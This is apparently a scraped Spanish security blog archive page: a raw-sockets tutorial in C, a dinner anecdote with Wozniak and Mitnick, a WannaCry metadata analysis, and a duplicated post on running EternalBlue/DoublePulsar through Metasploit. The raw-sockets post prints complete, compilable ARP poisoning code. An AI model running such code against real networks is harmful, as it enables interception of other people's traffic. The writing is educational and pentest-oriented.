Showing posts with label y. Show all posts
Showing posts with label y. Show all posts
Thursday, September 28, 2017
En crudo y sin censura RAW SOCKETS I en C
En crudo y sin censura RAW SOCKETS I en C

A lo largo de esta serie de entradas intentar� mostrar para qu� podemos utilizar la programaci�n de sockets (sobre todo los RAW) siempre mirando desde un prisma....digamos que oscuro....
Soy consciente que no es un tema f�cil de tratar, y mucho menos hacer que la lectura sea liviana a la par que amena...
Para seguir estos posts es necesario tener unos conocimientos m�nimos de redes, un poquito de C, as� como disponer de una m�quina linux, puesto que este tost�n est� orientado a sistemas Linux o Unix, como ya es com�n en mis entradas.
No pretendo desanimar a nadie, ya sea por lo de los conocimientos o por tener otro S.O... en ambos casos es facil (mas o menos) seguir las entradas. Es m�s, os animo a ello.
Tambi�n quiero dejar claro que que vamos a abordar el tema desde un punto de vista pr�ctico sin entrar mucho en detalles t�cnicos, si no podr�a ser una entrada eterna y tampoco pretendo explicar el modelo OSI (de lectura muy recomendada), a muchos os aburrir�a, as� que lo veremos de soslayo.
�Por qu� C? la respuesta es sencilla: si aprendes en C te ser� sencillo hacerlo en java, python o C++... Prueba al rev�s X-O. (respuesta de un profesor).
Es verdad que en python ser�a m�s sencillo (utilizando alguno de sus frameworks), imposible en muchos casos con java y m�s o menos parecido en c++; pero desde el punto de vista pedag�gico te pierdes muchos fundamentos valiosos.
Desde mi punto de vista ahora que estoy empezando con C, es simple, elegante y endiabladamente r�pido, compacto y eficiente..y muy Oldschool, sin menospreciar en absoluto a Python (pero hoy toca C).
�Qu� es un Socket? pues como dice la palabra es un enchufe!!...
Socket designa un concepto abstracto por el cual dos programas (posiblemente situados en computadoras distintas) pueden intercambiar cualquier flujo de datos, generalmente de manera fiable y ordenada.
El t�rmino socket es tambi�n usado como el nombre de una interfaz de programaci�n de aplicaciones (API) para la familia de protocolos de Internet TCP/IP, provista usualmente por el sistema operativo.
Segun esta interfaz tenemos tres grupos de sockets:
Socket de flujo (SOCK_STREAM): Define un servicio orientado a conexi�n confiable y bidireccional. Los datos se env�an sin errores o duplicaci�n y se reciben en el mismo orden de como fueron enviados. Podr�amos compararlo con una llamada de tel�fono.. recibir y mandar la informaci�n en su tiempo y de manera bidireccional es cr�tico para la comprensi�n del mensaje, de esto se encarga TCP...Ej dns, tftp, bootp, etc.
Socket de datagrama (SOCK_DGRAM): Define un servicio no orientado a conexi�n (sobre UDP por ejemplo). Los datagramas se env�an como paquetes independientes. El servicio no proporciona garant�as; los datos se pueden perder o duplicar y los datagramas pueden llegar fuera de orden. Soporta la bidirecionalidad pero no es su fuerte. Simplificando (demasiado) es similar a enviar una carta.
Socket raw (SOCK_RAW): Estos sockets nos permiten el acceso a los protocolos de comunicaciones,con la posibilidad de hacer uso o no de protocolos de capa 3 (nivel de red) y/o 4 (nivel de transporte), y por lo tanto d�ndonos el acceso a los protocolos directamente y a la informaci�n que recibe en ellos. El uso de sockets de este tipo nos va a permitir la implementaci�n de nuevos protocolos, y por que no decirlo, la modificaci�n de los ya existentes. Suena interesante no?.
Con esta verborrea trato de ubicar un poco al lector, pues despu�s de lo dicho nos vamos a centrar en el este �ltimo Socket raw o en crudo este tipo de socket trabaja sin estar ligado a un protocolo de comunicaci�n en concreto, es decir, podemos darle el sabor que necesitemos. Lo veremos m�s a delante.
Peculiaridades de Socket raw (SOCK_RAW)
- No incluye por defecto TCP; esto se traduce en perdida de fiabilidad.
- No tenemos que especificar puerto en la comunicaci�n.....O_o..... ya que es el propio kernel que recibe el paquete crudo el encargado de pasar la informaci�n de a todos los sockets que est�n escuchando el mismo protocolo, no hay conexiones de red virtuales como tal, es decir, no hay puertos.
- Los campos del Header los deberemos rellenar manualmente, al contrario que si trabaj�semos con otro tipo de socket; el kernel no rellena las cabeceras.
- Carece de un est�ndar.
- Para usar sockets de tipo raw en Unix es necesario contar con privilegios de root.
- hay dos tipos b�sicos de socket raw, y que la decisi�n de cu�l utilizar depende totalmente del objetivo y requisitos de la aplicaci�n que se desea:
. Familia AF_PACKET: los sockets raw de la familia AF_PACKET son los de m�s bajo nivel y permiten leer y escribir cabeceras de protocolos de cualquier capa.
. Familia AF_INET: los sockets raw AF_INET delegan al sistema operativo la construcci�n de las cabeceras de enlace y permiten una manipulaci�n �compartida� de las cabeceras de red.
En breve veremos en detalle la utilidad y funcionamiento de ambas familias.
- Y alguna m�s que seguro que escapa a mi intelecto (por culpa de alg�n gen recesivo).
�Qu� podemos hacer con raw socket?
Con los sockets SOCK_DGRAM y SOCK_DGRAM s�lo puedes decidir el contenido del PAYLOAD TCP o UDP pero no puedes leer ni escribir nada de lo que hay debajo: cabeceras IP, ICMP, ARP, Ethernet, etc.
Esto nos permitir� desde diagnoxticar ciertos aspectos de la red que de otro modo ser�a dif�cil, componer Datagramas a muy bajo nivel, y construir nuestras propias herramientas a medida de nuestros caprichos.
En definitiva nos va a hacer conocer mejor los protocolos y su seguridad.
Bueno ya para finalizar esta entrada (si no menuda chappa).. y para abrir boca os voy a dejar un codigo fuente de Victor Ramos Mello (que encontre en su Git, el cual me pareci� bueno como ejemplo) en el que hace uso de raw socket para manejar el protocolo ARP.
No atorarse!! ya lo examinaremos paso por paso, y desarrollaremos m�s para conseguir una herramienta MITM en pr�ximas entradas para ir ejercitando la mente.
Simple arp poison:
//arp-poison by m0nad
//tested in Linux 3.5.0
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <sys/socket.h>
#include <netpacket/packet.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <signal.h>
#define IP4LEN 4
#define PKTLEN sizeof(struct ether_header) + sizeof(struct ether_arp)
int sock;
void
usage()
{
puts("usage: ./arp-poison <interface> <gateway ip> <mac addr>");
puts("ex: ./arp-poison eth0 10.1.1.1 aa:bb:cc:dd:ee:ff");
exit(1);
}
void
cleanup()
{
close(sock);
exit(0);
}
int
main(int argc, char ** argv)
{
char packet[PKTLEN];
struct ether_header * eth = (struct ether_header *) packet;
struct ether_arp * arp = (struct ether_arp *) (packet + sizeof(struct ether_header));
struct sockaddr_ll device;
if (argc < 4) {
usage();
}
sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
if (sock < 0)
perror("socket"), exit(1);
signal(SIGINT, cleanup);
sscanf(argv[3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);
sscanf(argv[2], "%d.%d.%d.%d", (int *) &arp->arp_spa[0],
(int *) &arp->arp_spa[1],
(int *) &arp->arp_spa[2],
(int *) &arp->arp_spa[3]);
memset(eth->ether_dhost, 0xff, ETH_ALEN);//bcast
memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN);
eth->ether_type = htons(ETH_P_ARP);
arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
arp->ea_hdr.ar_pro = htons(ETH_P_IP);
arp->ea_hdr.ar_hln = ETH_ALEN;
arp->ea_hdr.ar_pln = IP4LEN;
arp->ea_hdr.ar_op = htons(ARPOP_REPLY);
memset(arp->arp_tha, 0xff, ETH_ALEN);
memset(arp->arp_tpa, 0x00, IP4LEN);
memset(&device, 0, sizeof(device));
device.sll_ifindex = if_nametoindex(argv[1]);
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN);
device.sll_halen = htons(ETH_ALEN);
puts("press ctrl+c to exit.");
while (1) {
printf("%s: %s is at %s ", argv[1], argv[2], argv[3]);
sendto(sock, packet, PKTLEN, 0, (struct sockaddr *) &device, sizeof(device));
sleep(2);
}
return 0;
}
para compilarlo:
#gcc arp-poison.c -o arp-poison
un saludo! hasta m�s ver...
download file now
Monday, September 25, 2017
Steve Wozniak Kevin Mitnick Chema Alonso cenan en California y yo me desmayo P
Steve Wozniak Kevin Mitnick Chema Alonso cenan en California y yo me desmayo P
S� que el t�tulo puede parecer un chiste, pero la verdad es que ayer fue un d�a muy divertido donde adem�s se cumpli� uno de mis sue�os como ingeniero: conocer a Steve Wozniak. Si a eso le sumas una cena en la que estoy adem�s con mi amigo Kevin Mitnick, la cosa no puede mejorarse mucho y para m� merece que me desmaye de la impresi�n.
![]() |
| Figura 1: Steve Wozniak, Kevin Mitnick & Chema Alonso cenan en California... y yo me desmayo }:P |
Llevaba mucho tiempo con ganas de este momento, y he de reconocer que lo prepar� con tiempo para que saliera perfecto. Todo comenz� en mi �ltima visita a Las Vegas, donde qued� para comer con Kevin Mitnick y unos amigos. All�, adem�s de hacernos unas fotos le ped� a Kevin que organizara la cena con Steve Wozniak para conocerle. En la foto siguiente, un recuerdo de cuando lo hablamos en Las Vegas.
Y con Kevin Mitnick }:) Great KevinA post shared by Chema Alonso (@chemaalonso) on
La historia es un poco m�s larga, y tiene de por medio un Rogue BlueTooth Speaker y el DirtyTooth Hack, pero permitidme que esa parte de la historia la deje para las cenas con amigos y el libro de mis memorias que alg�n d�a escribir�. Para hacer la historia corta, digamos que acordamos la cena para ayer noche, aprovechando el viaje a Silicon Valley que estamos haciendo y del que os estoy publicando muchas fotos en Instagram (y probablemente os cuente m�s en otro post).
.... y una cena con el gran Steve Wozniak and friends para terminar el d�a en San Jos� }:) #GreatA post shared by Chema Alonso (@chemaalonso) on
Teniendo la fecha de la cena cerrada para anoche, decid� que quer�a aprovechar bien este momento, as� que llam� a mi amigo Fran "Cybercaronte"- que est� ahora m�s feliz que una perdiz despu�s de haber hecho "fork" en su vida - para elegir un documento. Fran es un fan�tico de las historias de los hackers "old-school" (no es casualidad que le suplicara que escribiera el libro de MicoHistorias: An�cdotas y Curiosidades de la Historia de la Inform�tica, donde cuenta todas las aventuras de los hackers old-school) as� que le ped� que me ayudara a seleccionar cu�l era el documento que deb�a tener firmado por Steve Wozniak en mi colecci�n particular de "mit�mano".
![]() |
| Figura 4: Secci�n del esquema de la Digital BlueBox dise�ada por Wozniak en 1972 |
Entre los dos seleccionamos los esquemas que Wozniak hizo para la construcci�n de la Digital BlueBlox en el a�o 1972 [2] [3], con los que, como sab�is, los phreakers hackeaban a las empresas de telecomunicaciones. No me dig�is que no era el documento perfecto para ello. Seleccion� las p�ginas del esquema y las mand� imprimir en papel de alta calidad en A3 para lo que mis compa�eros de UX en ElevenPaths me echaron una mano. Quer�a que quedara perfecto.
Figura 5: Steve Wozniak "The Early Days"
Adem�s, quer�a hacer algo personal para la ocasi�n, as� que me puse manos a la obra para hacer un dibujo de No Lusers que conmemorara la cena. Aprovech� para verme muchas de las charlas de Steve Wozniak, y en concreto me gust� mucho una en la que hablaba de la Felicidad. Me gust� como Woz, que es tan buena gente, tan cercano y tan majo como te lo imaginas, buscaba la felicidad en cosas tan sencillas.
Con esa idea empec� a pensar en hacer un No Lusers con Steve Wozniak, Kevin Mitnick y JoseMariCari�o, y despu�s de tirar muchas p�ginas y muchos bocetos, termin� con una idea que plasm� en este papel en sucio. Lo publico solo para que ve�is lo ilusionado que estaba con la cena de anoche.
![]() |
| Figura 6: El primer boceto "serio" del dibujo de No Lusers |
Compart� este boceto con un grupo de amigos que me dieron sugerencias que tom� en consideraci�n. Las ideas del grupo de amigos en WhatsApp que se llama "Chulet�n as a Service" no deben ser desde�adas, as� que las tom� en consideraci�n. Quer�a que quedara bonito el dibujo, as� que me fui a comprar unos rotuladores Sakura. Hasta el momento intento dibujar con Sharpie, pero quer�a probar los Sakura, que aunque son un poco m�s "guarros" dan un efecto totalmente distinto, m�s tipo acuarela y menos rotulador. Mi hacker, aprovech� los rotuladores para hacerme el dibujo que ya os publiqu� en Instagram, y yo complet� mi No Lusers tal y como lo veis aqu� en una nueva hoja de mi bloc de dibujos.
![]() |
| Figura 7: El dibujo final re-hecho con rotuladores Sakura |
Y lleg� el momento de la cena... y fue genial. Steve Wozniak y Kevin Mitnick contando an�cdotas toda la noche. Deb�a haber puesto a grabar todo, pero estaba boquiabierto preguntando cosas. Hablando de BitCoins, de hackers, de Tesla, de Android, de iPhone, de los hacks de iCloud, de los problemas en las aduanas con los gadgeds o los punteros lasers. Fue genial. Me guardo todos estas an�cdotas para mis amigos y familiares m�s cercanos, porque son para entornos m�s �ntimos.
![]() |
| Figura 8: Woz explic�ndonos a Kevin Mitnick (es el que sale en la esquina superior izquierda) y a m� por qu� dise�� la BlueBox de esa forma. Great es poco. Con el Sharpie en la mano para firmarlas. |
Despu�s le ense�� a Woz el esquema del a�o 1972 de la Digital BlueBox impreso... y le encant�. Lo analiz�, nos explic� cada circuito, por qu� lo hab�a hecho as�, qu� partes cambi� luego y lo mejor, nos dijo que parte del dise�o de esta BlueBlox lo utiliz� luego para construir el primer Apple I. Si te digo que estaba en una nube en ese momento, seguro que te lo crees.
![]() |
| Figura 9: El esquema firmado por Woz |
Despu�s le ense�� el dibujo de No Lusers y le hizo gracia, as� que me firm� el orginal, que tambi�n me firm� Kevin Mitnick, y que se viene de vuelta a Espa�a para estar en mi casa - que se lo ense�ar� a los amigos cuando les cuente la historia -.
![]() |
| Figura 10: El dibujo No Lusers firmado por Woz & Mitnick |
Por �ltimo, tras la comida, las an�cdotas, Tras contarle el DirtyTooth Hack a Wozniak y que Kevin Mitnick le explicara qu� era la FOCA, tras la firma de las impresiones de los esquemas de la Digital BlueBox - hice varias copias, firm� cada una en un sitio distinto para que fueran diferentes y Kevin se llev� la suya - me dijo que nos hici�ramos una foto igual que en el dibujo y aqu� est�. Al final, a Kevin y Woz les regal� una copia en A3 del dibujo, que se han llevado.
Yesterday, Steve Wozniak, Kevin Mitnick & Josemaricari�o had dinner in California }:D #Great #FanA post shared by Chema Alonso (@chemaalonso) on
Supongo que muchos de los que est�is leyendo esto hubierais disfrutado como un ni�o en una feria en esta cena. Yo lo hice, y os garantizo que cuando estaba all�, pensaba:
"Joder, estoy sentado en la cena con Steve Wozniak y Kevin Mitnick. Wozniak y Mitnick, joder. �Qu� pasada!"Pues s�, fue como os lo pod�is imaginar. Legen - wait for it - dary!.
Saludos Malignos!
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Friday, September 22, 2017
El creador de WannaCry es fan de Messi no es muy ambicioso y usa Microsoft Word habitualmente en coreano
El creador de WannaCry es fan de Messi no es muy ambicioso y usa Microsoft Word habitualmente en coreano
Esta semana, nuestros compa�eros del laboratorio de ElevenPaths terminaban por publicar su an�lisis de WannaCry desde el punto de vista de los metadatos. Un enfoque no se hab�a puesto encima de la mesa a�n y que ellos han querido tocar de forma minuciosa y que, desde el punto de la investigaci�n forense ha dado muchos frutos en el pasado.
![]() |
| Figura 1: Un an�lisis de WannaCry desde el punto de vista de los metadatos |
No quiero en este post repetir el sesudo an�lisis que han hecho mis compa�eros del laboratorio, as� que os invito a leerlo completamente para entender todos los detalles - que es donde suele estar el diablo - pero si os voy a hacer un resumen de los datos m�s importantes para que teng�is una lectura r�pida.
Al atacante le gusta Messi
O puede que lo odie, lo cierto es que es analizando los metadatos de los ficheros RTF con los que WannaCry configura los textos en la pantalla en la que informa a la v�ctima que ha sido infectado, es el usuario que aparece.
| Figura 2: Textos multi-idioma en WannaDecryptor |
Puedes utilizar cualquier herramienta que extraiga metadatos de documentos RTF como nuestro MetaShield Clean-Up Online y analizar los resultados que se obtienen. En las cadenas se puede ver el nombre del usuario que es Messi.
![]() |
| Figura 3: Messi en el an�lisis de metadatos de los textos RTF de WannaCry con MetaShield Clean-Up Online |
Este nombre de usuario es el que el atacante utiliz� para crear o modificar con su editor de textos los ficheros RTF.
Utilizaci�n de Microsoft Word
Averiguar que el atacante utiliza Microsoft Word para crear los documentos RTF no es demasiado complejo, ya que, como sucede con muchas otras herramientas, Microsoft Word deja "Informaci�n Oculta" en los ficheros RTF. En las versiones m�s antiguas de Microsoft Office, es f�cil localizar esta versi�n en el atributo generator, pero no siempre aparece cuando son versiones modernas.
![]() |
| Figura 4: Especificaci�n RTF para el campo Generator |
Sin embargo, analizando c�mo implementa las especificaciones RTF se puede ver que el Internal Version Number - donde se guarda informaci�n de la versi�n del documento -sigue el estilo de Microsoft Office. Generalmente es un campo de 5 d�gitos, no muy bien documentado, y que otras herramientas utilizan de forma distinta. Para analizar los RTF utilizamos nuestra nueva herramienta MetaShield Clean-Up Online, donde se puede subir un documento en este formato y ver qu� metadatos tiene.
Utiliza Microsoft Word en Coreano
El indicio que nos lleva a pensar a que con gran probabilidad es Microsoft Office y con idioma en Coreano es, precisamente, la forma en que se comporta Microsoft Word con los idiomas cuando se hace esa configuraci�n.
| Figura 5: Idiomas en el documento RTF de WannaCry |
En los documentos RTF usados en WannaCry salen tres idiomas, como se puede ver en la siguiente imagen que son Coreano, Ingl�s y �rabe. El primero de ellos aparece en la etiqueta del metadato deflang con el control plain, lo que indica que es el de por defecto. La cadena de metadatos exacta es:
tf1adeflang1025ansiansicpg1252uc2adeff31507deff0stshfdbch31505stshfloch31506stshfhich31506stshfbi0deflang1033deflangfe1042
El que se utilice el ingl�s es porque si se configurar una versi�n de Microsoft Word con el idioma Coreano, �ste software siempre a�ade el idioma ingl�s - es el comportamiento de Microsoft Office y pod�is comprobarlo -. Adem�s, el que aparezca el idioma �rabe es porque existen versiones de Microsoft Office "EMEA" en que el idioma por defecto para versiones asi�ticas, y se mete en el metadato adeflangfe.
| Figura 6: Selecci�n de idioma por defecto en Microsoft Office |
En definitiva, analizando el comportamiento de Microsoft Word con este tipo de documentos hace pensar en que el idioma por defecto es Corenao, a pesar de que los documentos est�n escritos en Chino o Let�n.
Una cosa interesante es que se puede analizar cu�nto es el tiempo que ha tardado en editar cada uno de los ficheros RTF que se usa para todos los idiomas, y parece que se tom� mucho m�s tiempo para la versi�n de Chino Simplificado, y luego un poco menos para Ingl�s y B�lgaro, mientras que para el resto de los idiomas casi no dedica tiempo.
| Figura 7: Tiempo de edici�n por tipo de fichero de idioma |
En el caso de las revisiones sucede lo mismo. Chino es la que m�s revisiones cuenta, lo que parece que le pudo llevar a matizar m�s el texto de ese idioma.
| Figura 8: N�mero de revisiones por tipo de documento |
�Esto quiere decir algo? Pues lo que quieras interpretar, pero est� claro que el que escribi� esos documentos parec�a tener m�s inter�s - o conocimiento - del Chino tradicional que de otros idiomas.
Esta parte del an�lisis es de las m�s curiosas, ya que no solo tenemos la informaci�n de los metadatos de RTF y contamos tambi�n con los metadatos de los ficheros ZIP. En las versiones de WannaCry se utiliza un fichero ZIP para descargar el ransomware, y en �l se almacena la fecha del �ltimo acceso con su propia zona horaria. Analizando las fechas del ZIP se puede concluir que:
2017-04-27 17:25 (hora local del atacante): El atacante crea b.wnry, un fichero BMP en segundo plano y el r.wnry, que contiene el fichero "readme".
2017-05-09 16:57: El atacante crea otro zip con herramientas para conectarse a la red Tor y negociar el rescate. Se descargaron en el sistema de archivos del atacante a las 16:57, 09/05/2017, hora local del atacante, y son empaquetados e introducidos en un nuevo zip, s.wnry.
2017-05-10 01:16: El atacante crea en su sistema c.wnry, que contiene dominios onion de la red Tor y una cartera para bitcoins.
2017-05-11 15:59: Crea r.wnry que contiene instrucciones de borrado.
2017-05-11 16:47: Edita b.wnry.
2017-05-11 20:11: Edita c.wnry de nuevo.
2017-05-11 20:13: Introduce b.wnry en el zip y lo comprime con contrase�a.
2017-05-12 02:22: A�ade los ficheros EXE: u.wnry y t.wnry. El atacante empaqueta y establece una contrase�a. El payload de gusano est� listo.
Teniendo en cuenta que cada vez que se infecta un equipo se accede al fichero ZIP para extraer el ransomware, y que las primeras infecciones fueron descubiertas en la zona de Tailandia sobre las UTC 00:00, entonces podemos asumir cuales ser�an las zonas GMT posibles, es decir, que dentro de ese mismo d�a fueran posteriores a la fecha de creaci�n del ramsonware.
![]() |
| Figura 9: Zonas horarias v�lidas con las fechas de los archivos ZIP |
Podr�a ser coreano (UTC+9), pero tambi�n de cualquier zona entre UTC+3 y UTC+12 como pod�is ver en la infograf�a superior.
Por �ltimo, el tema del dinero es bastante pecuiliar. A d�a de hoy, tal y como vimos al principio, el autor no ha retirado ning�n BitCoin de los monederos, pero es que hemos revisado las carteras de la primera versi�n de WannaCry 1.0 (Sin contar con la "gusanificaci�n" v�a EternalBlue), y sigue sin haber retirado ning�n bitCoin de ellas.
| Figura 10: Billetera BitCoin utilizada en WannaCry 1.0 |
Es decir, que el creador de estas dos campa�as WannaCry 1.0 y WannaCry 2.0 no ha retirado ning�n dinero de lo obtenido co el malware. Vamos, que o no ten�a ning�n inter�s en ello desde el minuto uno, o se ha arrepentido.
PD: M�s referencias.
- El ataque del ransomware WannaCry
- Telef�nica WannaCry File Restorer
- Telef�nica WannaCry File Restorer Desktop Version
- Telef�nica WannaCry File Restorer en Active Directory
- Latch Antiransonware para luchar contra el ransomware
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Wednesday, September 20, 2017
Hackear Windows 7 2008 R2 con Eternalblue y Doublepulsar de ShadowBroker usando Metasploit
Hackear Windows 7 2008 R2 con Eternalblue y Doublepulsar de ShadowBroker usando Metasploit
El pasado viernes 14 de Abril - viernes santo en Espa�a - The Shadow Brokers public� una gran cantidad de herramientas pertenecientes al Arsenal de la NSA. Se puede encontrar dichas herramientas en el repositorio de Github de misterch0c.
Mi compa�era en ElevenPaths Sheila A. Berta (@UnaPibaGeek) public� en Exploit-DB un paper, tambi�n con versi�n en ingl�s, en el que se explica c�mo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoy�ndose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit. Gran trabajo, sin duda, de Sheila.
Sheila formul� una pregunta interesante en su paper y es: �Por qu� Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el �nico que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticaci�n. Por lo que, Eternalblue es el exploit que nos permitir� aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.
Dichoe esto, el pasado jueves mis compa�eros Sheila y Claudio Caracciolo (@holesec) me preguntaron por la posibilidad de hacer una migraci�n del exploit Eternalblue que es utilizado en Fuzzbunch en el leak a mi querido Metasploit. El gusto por la seguridad y por la tecnolog�a nos puede y nos pusimos de forma r�pida y �gil manos a la obra en ElevenPaths.
Tras revisar paso a paso el trabajo de Sheila, empec� a hacer mis peque�as pruebas. El pasado jueves no sab�amos bien qu� cosa hac�a el exploit de Eternalblue, y observando Fuzzbunch vimos que lo �nico que hacen es lanzar el binario contra un target concreto. No tenemos el c�digo del exploit para poder portarlo completamente. Entonces, el plan era migrar la configuraci�n de los binarios y la ejecuci�n de �stos para que desde Metasploit se pudiera hacer. Manos a la obra.
FuzzBunch: Loader de binarios
Analizando FuzzBunch te das cuenta que se genera una serie de ficheros XML asociados a un proyecto en curso y que esos ficheros XML son los que tienen los par�metros y opciones con las que se lanzan los binarios, en este caso, exploits o payloads. El primer objetivo era entender bien los archivos XML, ver qu� era lo necesario y poder ejecutar el binario sin utilizar FuzzBunch.
De los tres ficheros XML que se generan, acab� viendo que el importante es el de InConfig o configuraci�n de entrada, ya que es el que el exploit lee para poder ejecutarse. En la imagen siguiente puede verse como, al lanzar el binario por s� solo, no se encuentra el fichero XML de configuraci�n y el exploit no es lanzado. Sin embargo, cuando le ponemos el fichero XML correctamente, el binario es lanzado con la configuraci�n indicada en el archivo de configuraci�n InConfig.
En la siguiente imagen, se puede ver el contenido del fichero InConfig.XML para Eternalblue. En �l se indican los tipos de datos, las posibilidades y los valores que tienen los atributos o variables.
Analizando esto llegamos a una conclusi�n: Podr�amos hacer un m�dulo de Metasploit que implemente la configuraci�n del XML de Eternalblue, posteriormente el de Doublepulsar que ser� muy similar, generar una DLL con el Payload que el usuario elija en Metasploit y lanzar ambos binarios, el exploit y el paylaod.
Otro problema: �Windows?
Por el camino surgi� otro problema, y es que el exploit Eternalblue y Doublepulsar son binarios para Windows. Le pregunt� a Sheila y ella me contest� "�Qui�n utiliza Metaspoit en Windows?". Con la boca chica pens� en confesar que yo algunas veces (te toca torear en pelear en el campo de batalla que te toca), pero ella estaba en lo cierto, generalmente Metasploit se utiliza en sistemas Linux. Adem�s, nosotros quer�amos hacerlo con nuestro querido Kali Linux.
La respuesta aqu� no se hizo esperar, nos tocar�a tirar de Wine para que el m�dulo de Metasploit lo utilice y pueda lanzar los binarios con sus configuraciones. Hay que tener en cuenta que para que el m�dulo funcione correctamente en sistemas Kali Linux tenemos que tener instalado Wine con compatibilidad para binarios de 32 bits.
Detectar v�ctimas vulnerables a Eternalblue
El pasado martes 17 de Abril se public� un m�dulo auxiliary de Metasploit que permite detectar en una red si alguno de los equipos es vulnerable al CVE-2017-010, es decir, a Eternalblue. Decid� probar el m�dulo y ver un poco c�mo estaba hecho y la sensaci�n es que la liberaci�n del c�digo del exploit est� muy cerca.
Si eres un personal de IT te recomendamos que apliques los parches de seguridad para esta vulnerabilidad lo antes posible las m�quinas de tu empresa o dominio, ya que es una vulnerabilidad cr�tica que podr�a ser explotada por cualquiera, al no requerir la interacci�n por parte del usuario, solamente disponer de conectividad con la m�quina.
Nuestro m�dulo para Metasploit: eternalblue_doublepulsar o eternal11
La historia del nombre del m�dulo nos dar�a para otro art�culo entre Sheila y yo, pero baste decir que le pusimos eternal11. El algoritmo utilizado para este caso os lo dejo aqu� en un sencillo pseudoc�digo:
Ha sido divertido pasar unas horas locas trabajando en esto e intentando hacer un m�dulo que pueda ayudar a auditar los sistemas Microsoft d�nde Eternalblue sigue presente. En el siguiente v�deo tienes una demostraci�n de este m�dulo funcionando.
Y tambi�n la tienes disponible la PoC para los equipos Windows 7 y Windows Server 2008 R2 en versiones x64, que tambi�n funciona, como pod�is ver en este v�deo.
Actualiza lo antes posible todos tus sistemas Microsoft Windows vulnerables y prot�gete de las amenazas que han surgido con este leak de exploits. Quiero agradecer el trabajo de mi compa�era Sheila A. Berta y como viene en la descripci�n del m�dulo:
Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths
![]() |
| Figura 1: Hackear Windows 7 & Windows Server 2008 R2 con ternalblue y Doublepulsar de ShadowBroker usando Metasploit |
Mi compa�era en ElevenPaths Sheila A. Berta (@UnaPibaGeek) public� en Exploit-DB un paper, tambi�n con versi�n en ingl�s, en el que se explica c�mo explotar la vulnerabilidad Eternalblue & Doublepulsar para obtener una Shell apoy�ndose en Powershell Empire para lograr, posteriormente, un Meterpreter de Metasploit. Gran trabajo, sin duda, de Sheila.
Figura 2: Explotar Eternalblue & Doublepulsar para obener una shell
de Empire/Meterpreter en Windows 7/Windows Server 2008 R2
Sheila formul� una pregunta interesante en su paper y es: �Por qu� Eternalblue & Doublepulsar? La respuesta es sencilla, ya que entre los exploits que se publicaron, Eternalblue es el �nico que se puede utilizar para atacar sistemas Windows 7 y Windows Server 2008 R2 sin necesidad de autenticaci�n. Por lo que, Eternalblue es el exploit que nos permitir� aprovecharnos de un fallo de seguridad en el protocolo SMB para que, posteriormente, Doublepulsar pueda inyectar remotamente, por ejemplo, una DLL, ya que existen otras posibilidades.
![]() |
| Figura 3: Lista de exploits para Windows publicados por Shadowbroker |
Dichoe esto, el pasado jueves mis compa�eros Sheila y Claudio Caracciolo (@holesec) me preguntaron por la posibilidad de hacer una migraci�n del exploit Eternalblue que es utilizado en Fuzzbunch en el leak a mi querido Metasploit. El gusto por la seguridad y por la tecnolog�a nos puede y nos pusimos de forma r�pida y �gil manos a la obra en ElevenPaths.
Tras revisar paso a paso el trabajo de Sheila, empec� a hacer mis peque�as pruebas. El pasado jueves no sab�amos bien qu� cosa hac�a el exploit de Eternalblue, y observando Fuzzbunch vimos que lo �nico que hacen es lanzar el binario contra un target concreto. No tenemos el c�digo del exploit para poder portarlo completamente. Entonces, el plan era migrar la configuraci�n de los binarios y la ejecuci�n de �stos para que desde Metasploit se pudiera hacer. Manos a la obra.
FuzzBunch: Loader de binarios
Analizando FuzzBunch te das cuenta que se genera una serie de ficheros XML asociados a un proyecto en curso y que esos ficheros XML son los que tienen los par�metros y opciones con las que se lanzan los binarios, en este caso, exploits o payloads. El primer objetivo era entender bien los archivos XML, ver qu� era lo necesario y poder ejecutar el binario sin utilizar FuzzBunch.
De los tres ficheros XML que se generan, acab� viendo que el importante es el de InConfig o configuraci�n de entrada, ya que es el que el exploit lee para poder ejecutarse. En la imagen siguiente puede verse como, al lanzar el binario por s� solo, no se encuentra el fichero XML de configuraci�n y el exploit no es lanzado. Sin embargo, cuando le ponemos el fichero XML correctamente, el binario es lanzado con la configuraci�n indicada en el archivo de configuraci�n InConfig.
![]() |
| Figura 4: Ejemplo sn y con el fichero InConfig.xml |
En la siguiente imagen, se puede ver el contenido del fichero InConfig.XML para Eternalblue. En �l se indican los tipos de datos, las posibilidades y los valores que tienen los atributos o variables.
![]() |
| Figura 5: Contenido de InConfig.XML |
Analizando esto llegamos a una conclusi�n: Podr�amos hacer un m�dulo de Metasploit que implemente la configuraci�n del XML de Eternalblue, posteriormente el de Doublepulsar que ser� muy similar, generar una DLL con el Payload que el usuario elija en Metasploit y lanzar ambos binarios, el exploit y el paylaod.
Otro problema: �Windows?
